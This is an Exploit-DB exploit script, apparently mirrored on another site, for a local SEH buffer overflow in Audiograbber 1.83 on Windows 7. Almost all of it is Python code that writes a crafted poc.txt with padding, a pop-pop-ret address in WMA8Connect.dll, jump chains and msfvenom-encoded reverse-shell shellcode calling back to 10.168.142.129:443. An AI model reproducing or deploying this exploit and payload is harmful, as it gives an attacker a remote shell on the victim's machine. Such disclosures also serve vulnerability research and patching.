Audiograbber 1.83 – Local Buffer Overflow (SEH)

  • 作者: Dennis 'dhn' Herrmann
    日期: 2018-06-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44903/
  • # Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
    # Date: 2018-06-16
    # Exploit Author: Dennis 'dhn' Herrmann
    # Vendor Homepage: https://www.audiograbber.org/
    # Version: 1.83
    # Tested on: Windows 7 SP1 (x86)
    
    #!/usr/bin/env python
    # $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
    #
    # Tested with Windows 7 SP1 (x86)
    # Steps:
    #- Paste "poc.txt" content in the "Interpret" or "Album" field
    
    class Exploit:
    
    def __init__(self, shellcode):
    self._shellcode = shellcode
    self._payload = None
    
    def __write(self):
    f = open("poc.txt", "w")
    f.write(self._payload)
    f.close()
    
    def run(self):
    pattern = "A" * 256
    jmp_short = "\xeb\x08\x90\x90"# short JMP
    pop2ret = "\x79\x91\x01\x10"# WMA8Connect.dll
    
    self._payload = pattern
    self._payload += jmp_short
    self._payload += pop2ret
    
    # The buffer is mangled so we have to jump
    # over the parts to reached our shellcode
    self._payload += "\x90" * 18 + jmp_short
    self._payload += "\x90" * 28 + jmp_short
    self._payload += "\x90" * 32 + self._shellcode 
    
    self.__write()
    
    def main():
    # msfvenom --platform windows -p windows/shell_reverse_tcp \
    # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
    # -e x86/alpha_mixed -f py
    shellcode = (
    "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
    "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
    "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
    "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
    "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
    "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
    "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
    "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
    "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
    "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
    "\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
    "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
    "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
    "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
    "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
    "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
    "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
    "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
    "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
    "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
    "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
    "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
    "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
    "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
    "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
    "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
    "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
    "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
    "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
    "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
    "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
    "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
    "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
    "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
    "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
    "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
    "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
    "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
    "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
    "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
    "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
    "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
    "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
    "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
    "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
    "\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
    "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
    "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
    "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
    "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
    "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
    "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
    "\x6b\x4f\x69\x45\x41\x41"
     )
    
    exploit = Exploit(shellcode)
    exploit.run()
    
    
    if __name__ == "__main__":
    main()